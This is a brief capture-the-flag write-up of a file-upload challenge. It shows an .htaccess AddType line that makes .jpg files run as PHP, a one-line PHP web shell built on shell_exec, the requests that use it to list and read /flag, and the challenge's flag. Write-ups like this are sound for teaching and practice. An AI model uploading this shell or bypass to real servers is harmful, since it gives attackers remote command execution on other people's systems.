Safe upload - CTF-Writeups

Challenge Name : S4F3 UPL04D

Author :L0xm1

Challenge Description

Uploading files is safe ..right??

Writeup

This is a basic file upload challenge where you can upload images of .jpg extension .

If you look into the source code we can see that .php file extensions are blacklisted.

We can upload a .htaccess file with the following line AddType application/x-httpd-php .jpg which executes all .jpg files as php files.

After successfully uploading the .htaccess file we can upload a .jpg file containing a php shell for eg: <?php $cmd=$_GET["cmd"]; $q=shell_exec($cmd); echo $q; ?>

Now when we visit /uploads/{you file name}.jpg?cmd=ls / ,we can see that flag is in /flag.

We can get the flag using /uploads/{you file name}.jpg?cmd=cat /flag

Flag

shaktictf{f1l3_upl0ad_iz_s4f3_ryt??}

Keys	Action
`?`	Open this help
`n`	Next page
`p`	Previous page
`s`	Search